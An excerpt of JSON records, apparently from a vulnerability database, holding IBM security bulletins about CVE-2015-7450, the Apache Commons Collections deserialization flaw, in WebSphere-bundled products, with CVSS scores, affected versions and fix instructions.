["CVE-2015-7450"], "modified": "2018-06-17T22:32:47", "id": "DF1E63CF8B14528F156628BE21730C46B9AD6FEBFA9BE46C21DFFEFE8A0D3852", "href": "https://www.ibm.com/support/pages/node/619215", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:49", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of RequisitePro. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server __(CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Rational RequisitePro 7.1.3.x, 7.1.4.x **\n\nThis vulnerability affects the RequisiteWeb component.\n\n## Remediation/Fixes\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.3.x \n7.1.4.x| Apply the appropriate WebSphere Application Server fix directly to your RequisiteWeb server host. No RequisiteWeb-specific steps are necessary. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:46", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational RequisitePro (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:46", "id": "3484930B9D1D577B443F9B6823E8F4CFC7578B80B89E16866C07AC9046A0F330", "href": "https://www.ibm.com/support/pages/node/272249", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:11", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nPrincipal Product and Versions\n\n| Affected Supporting Product and Versions \n---|--- \n \nIBM Case Manager 5.3CD\n\n| \n\nIBM WebSphere Application Server 9.0 \n \n \n\n\n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \$CVE-2015-7450\$\" ) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "C4201BA18FD219F4998B9CD1F31247B019E4B70DABFE54578652DCDBE9377D5D", "href": "https://www.ibm.com/support/pages/node/1110435", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:41:32", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, CCRC WAN server/CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x:**\n\n \nThis vulnerability only applies to the CCRC WAN server component. \n**Versions 7.1.x.x:**\n\n \nNot affected.\n\n## Remediation/Fixes\n\nReview the security bulletin referenced above and apply the relevant fixes to your WAS installation used for ClearCase. \n \n\n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x \n8.0.1.x| Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-07-10T08:34:12", "id": "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "href": "https://www.ibm.com/support/pages/node/271515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:07", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of Identity Insight. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIdentity Insight 8.0 & 8.1 bundling embedded WebSphere Application Server 7.0\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:14", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Identity Insight (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:14", "id": "D66F1CF05D4FAEAA1D2A1BD6C942DFBCEFA7698121E07EA674D81BA77E984AF6", "href": "https://www.ibm.com/support/pages/node/271849", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T05:44:46", "description": "## Summary\n\nWebsphere Application Server is shipped with Predictive Customer Intelligence. Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nPredictive Customer Intelligence version 1.1.2\n\n \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)** | ** Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin ** \n---|---|--- \nPredictive Customer Intelligence 1.1.2 | Websphere Application Server 9.0.0.4| \n\n# [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \$CVE-2015-7450\$\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-18T15:39:14", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability has been Identified in Websphere Application Server Shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-18T15:39:14", "id": "AC54A5DAFA15D91044EA9FE6159829752BCD0E35D53719860B2A80D7AB2DBBA9", "href": "https://www.ibm.com/support/pages/node/2861979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:10", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM WebSphere Remote Server - Product Family| 9.0 \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server.\n\nPrincipal Product and Version(s)\n\n| \n\nAffected Supporting Product and Version\n\n| \n\nAffected Supporting Product Security Bulletin \n \n---|---|--- \n \nWebSphere Remote Server \n9.0\n\n| \n\nWebSphere Application Server 9.0\n\n| \n\n[Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "E3BAE9A30B20D04512C7C16881BAE14D80726FD5F24F3B32C3DF1C51B000477A", "href": "https://www.ibm.com/support/pages/node/1111257", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:47", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of Predictive Customer Intelligence. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nPredictive Customer Intelligence 1.0| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.0.1| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.1| WebSphere Application Server 8.5.5 ND \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T21:31:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-11T21:31:00", "id": "C2589DFBD09C40CB0ED3C14A127AD44309E3A47D40C1ABCBAA157F4307C403C7", "href": "https://www.ibm.com/support/pages/node/271725", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of SmartCloud Cost Management and Tivoli Usage Accounting Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nSmartCloud Cost Management 2.1 \nSmartCloud Cost Management 2.1.0.2 \nSmartCloud Cost Management 2.1.0.3 \nSmartCloud Cost Management 2.1.0.4| IBM WebSphere Application Server Liberty Core 8.5.5 \nTivoli Usage Accounting Manager 7.1| IBM WebSphere Application Server 6.1 \nTivoli Usage Accounting Manager 7.3 | IBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED", "href": "https://www.ibm.com/support/pages/node/609175", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli Netcool/Impact. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Netcool/Impact 6.1.x| WebSphere 7.0 \nTivoli Netcool/Impact 7.1.0| WebSphere Liberty Profile 8.5.5 \n \n## Remediation/Fixes\n\n_VRMF_\n\n| _Websphere release level_| _Remediation_ \n---|---|--- \n6.1.*| 7.0| Apply Interim Fix [_PI52103_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>) \n\\-- OR \nApply Fix Pack 41 (7.0.0.41), or later (targeted availability 11 April 2016 *) \n \nFor instruction on how to upgrade Websphere see the latest 6.1.* Netcool Impact FP readme. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n7.1.0.0 \n7.1.0.1 \n \n7.1.0.2| 8.5.5.2 \n \n \n8.5.5.4| Move to 7.1.0-TIV-NCI-FP0003 and apply Interim Fix for PI52103. See 8556-wlp-archive-IFPI52103 in <http://www-01.ibm.com/support/docview.wss?uid=swg24041257>[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>).[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>) \n \n7.1.0-TIV-NCI-FP0003 is available here: \n<http://www.ibm.com/support/docview.wss?uid=swg24040149> \n7.1.0.3| 8.5.5.6| Apply Interim Fix for PI52103. See 8556-wlp-archive-IFPI52103 in <http://www-01.ibm.com/support/docview.wss?uid=swg24041257>[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041152>). \n7.1.0.4 (future release)| 8.5.5.6+PI45266+PI52103| Impact 7.1.0.4 (due Q4 2015 *) will update Websphere Liberty Profile with fix for PI45266+PI52103. No further action is required to manually update WLP. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n(future release)| 8.5.5.8 (future release)| Plans to update Websphere Liberty Profile to version 8.5.5.8 (planned for release mid-Dec 2015*) are included for the next service release for Impact (due Q2 2016 *) \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n \nTivoli Netcool/Impact 5.1.1 is not affected as this ships with WebSphere 6.1. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM WebSphere Application Server affects Tivoli Netcool Impact (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:22", "id": "F9ADD5C0B29D5EA4036B7F3A5477FA4502428CD7F7F7ABD1AF85EE16C6650D8F", "href": "https://www.ibm.com/support/pages/node/272341", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:06", "description": "## Summary\n\n \nIBM WebSphere Application Server is shipped as a component of Tivoli Business Service Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin \n\n## Vulnerability Details\n\nPlease consult the security bulletin [**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.. \n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.1.x| WebSphere 7.0 \n \n## Remediation/Fixes\n\n_Principal Product and Version(s)_\n\n| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.1.x| WebSphere 7.0 \n \nApply Interim Fix [_PI52103_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>) \n\\-- OR \nApply Fix Pack 41 (7.0.0.41), or later (targeted availability 11 April 2016 *) \n \nFor instruction on how to upgrade Websphere see the latest 6.1.* Tivoli Business Service Manager FP readme. \n \n_* Note this date is a scheduled date and does not represent a formal commitment by IBM._ \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM WebSphere Application Server affects Tivoli Business Service Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:22", "id": "182B7E2B619361F12F4ED5FC874487EFED77E355247E741885559BD37BCBA877", "href": "https://www.ibm.com/support/pages/node/272345", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:10", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Sterling B2B Integrator.\n\n## Vulnerability Details\n\n**CVE ID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling B2B Integrator 5.2 \n\nSterling Integrator 5.1\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**APAR**\n\n| \n\n**Remediated Fix** \n \n---|---|---|--- \nSterling Integrator | 5.1| IT12208| Apply Generic Interim Fix 5010004_9 available on [_IWM_](<https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=swg-SterlngLegacyreq>) \nIBM Sterling B2B Integrator| 5.2.0.0-5.2.5.0| IT12208| \n\n 1. Upgrade IBM Sterling B2B Integrator to 5.2.5.0.\n 2. Apply Generic Interim Fix 5020500_10 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=5.2.5.0&platform=All&function=all>) \nNote: If you cannot upgrade the Sterling B2B Integrator to 5020500_10, you may follow the instructions for Sterling Integrator 5.1 \nIBM Sterling B2B Integrator| 5.2.6.0| IT12208| \n\n 1. Apply Fix Pack 5020601 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n**If you use IBM Global Mailbox, do the following additional steps \n**\n 2. Download com.ibm.mailbox.gdha.fix.offering-1.0.0.0_1.zip from [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>)\n 3. Follow the instructions for [_Installing an Interim Fix_](<http://www-01.ibm.com/support/knowledgecenter/SS3JSW_5.2.0/com.ibm.help.sb2bi_install_upgrade_526.doc/com.ibm.help.ifix_526.doc/gdha_installing_ifix_to_si526.html?lang=en>) \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-05T00:53:36", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Sterling B2B Integrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 